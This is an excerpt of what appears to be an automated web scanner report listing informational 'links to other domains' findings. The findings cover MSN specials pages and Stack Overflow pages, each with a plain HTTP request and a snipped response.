P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6109665202c646a79b6809b0b630c396; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=38D1933830BB453D86CDB94040A09991; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 33278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406693&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FTwitter-Death-Hoaxes-2010.aspx%3Fcp-documentid%3D26967180%26imageindex%3D1&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=avril+lavigne+died+snowboard+accident&amp;form=msnhal"><strong>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=avril+lavigne&amp;form=msnhal">Avril Lavigne</a> (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=avril+lavigne&amp;qpvt=avril+lavigne&amp;FORM=msnhal">see photos</a>) is the first celebrity death hoax of 2011. The rocker is rumored to have died in a freak accident. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=avril+lavigne+died+snowboard+accident&amp;form=msnhal">Get the details</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.334. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/TV/Reality-show-and-housewives.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/TV/Reality-show-and-housewives.aspx?cp-documentid=27237519&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fe7758719542440cb7a593ba7fed7eab; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=FEF45778E4A3484FB7C43D6E672C73BA; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:39 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406719&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FTV%2FReality-show-and-housewives.aspx%3Fcp-documentid%3D27237519%26imageindex%3D1&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Reality+show+and+housewives&amp;form=msnhal"><strong>
...[SNIP]...
<div>From "<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Real+Housewives+of+Atlanta&amp;form=msnhal">The Real Housewives of Atlanta</a>" and "New York City" to shows about the <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=basketball+wives+and+football+wives+shows&amp;form=msnhal">wives of sports stars</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=scripted+and+reality+tv+shows&amp;form=msnhal">Some shows use scripts</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=reality+tv+stars+and+where+are+they+now&amp;form=msnhal">Where are some reality stars now?</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&amp;form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&amp;go=&amp;form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&amp;form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&amp;form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.335. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/TV/Reality-show-and-housewives.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /A-List/TV/Reality-show-and-housewives.aspx?cp-documentid=27237519&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=478206409c4041c1abf72a8225e69257; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=838D8B011B6C4F18B57F68D2634EBD5A; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:30 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345090&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FA-List%2FTV%2FReality-show-and-housewives.aspx%3Fcp-documentid%3D27237519%26imageindex%3D1&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Reality+show+and+housewives&amp;form=msnhal"><strong>
...[SNIP]...
<div>From "<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Real+Housewives+of+Atlanta&amp;form=msnhal">The Real Housewives of Atlanta</a>" and "New York City" to shows about the <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=basketball+wives+and+football+wives+shows&amp;form=msnhal">wives of sports stars</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=scripted+and+reality+tv+shows&amp;form=msnhal">Some shows use scripts</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=reality+tv+stars+and+where+are+they+now&amp;form=msnhal">Where are some reality stars now?</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&amp;form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&amp;form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&amp;FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&amp;go=&amp;form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.336. http://specials.redacted/IEIncreaseFont_preview.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /IEIncreaseFont_preview.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /IEIncreaseFont_preview.aspx?cp-documentid=9149805&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=59eaa5d4bf3c4cbfbaf9ae34ffb0980c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=07E0779BA6B64CAF972165E63DC53F53; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:55 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345055&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FIEIncreaseFont_preview.aspx%3Fcp-documentid%3D9149805%26imageindex%3D1&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.337. http://specials.redacted/IEIncreaseFont_preview.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /IEIncreaseFont_preview.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /IEIncreaseFont_preview.aspx?cp-documentid=9149805&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a90e4750539843a7bda27290d63ad314; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=3EFF066D045744A5A98A6B5FAA662925; domain=.redacted; expires=Thu, 18-Aug-2011 16:57:45 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406665&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fspecials.redacted%2FIEIncreaseFont_preview.aspx%3Fcp-documentid%3D9149805%26imageindex%3D1&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.338. http://sstatic.net/Js/wmd.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /Js/wmd.js

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /Js/wmd.js?v=508538fa9757 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/x-javascript
Last-Modified: Sun, 30 Jan 2011 11:16:50 GMT
Accept-Ranges: bytes
ETag: "c48fee306fc0cb1:0"
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:40 GMT
Content-Length: 39657

var Attacklab=Attacklab||{};var Attacklab=Attacklab||{};Attacklab.showdown=Attacklab.showdown||{};Attacklab.prePreviewHtmlHook=function(a){return a};Attacklab.postPreviewHtmlHook=function(a){return a}
...[SNIP]...
<br>Need <a href='http://www.google.com/search?q=free+image+hosting' target='_blank'>free image hosting?</a>
...[SNIP]...
<div style='position: absolute; right: 20px; bottom: 5px; font-size: 10px;'>image hosting by <a title='imgur: the simple image sharer' href='http://imgur.com'>imgur.com</a>
...[SNIP]...
ype='file' name='filename' id='filename-input' value='browse' style='border:0; font-size:18px; position:relative; text-align:right; -moz-opacity:0; filter:alpha(opacity: 0); opacity: 0; z-index: 2;'> <img src='http://i.imgur.com/GKc7H.png' height='15px' width='15px' style='position: absolute; left: 38px; top: 11px;'> <div style='position: absolute; top:0px; left:0px; z-index: 1;'>
...[SNIP]...

22.339. http://stackoverflow.com/users/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /users/login

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /users/login?returnurl=%2fusers HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/users
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.4.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Set-Cookie: gauthed=; expires=Sat, 29-Jan-2011 15:12:49 GMT; path=/
Date: Sun, 30 Jan 2011 15:12:49 GMT
Content-Length: 14133


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Log In - Stack Overflow</title>

<link rel="stylesheet" type="text/css" href="http://sstatic.net/stackoverflow/all.css?v=90776b57f91f">
<link rel="shortcut icon" href="http://sstatic.net/stackoverflow/img/favicon.ico">
<link rel="apple-touch-icon" href="http://sstatic.net/stackoverflow/img/apple-touch-icon.png">
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
<meta http-equiv="X-XRDS-Location" content="http://stackoverflow.com/yadis">


<link rel="stylesheet" href="http://sstatic.net/openid.css?v=3">
<script type="text/javascript" src="http://sstatic.net/Js/third-party/openid-jquery.js?v=7"></script>
...[SNIP]...
<div id="portalLink">

<a class="genu" href="http://stackexchange.com">Stack Exchange</a>
...[SNIP]...
<p>OpenID is a service that allows you to log on to many different websites using a single identity.
Find out <a href="http://openid.net/what/">more about OpenID</a> and <a href="http://openid.net/get/">how to get an OpenID enabled account</a>
...[SNIP]...
<b style="font-size:130%"><a href="https://www.myopenid.com/signup?affiliate_id=46486">click here to sign up</a>
...[SNIP]...
<p class="ar">
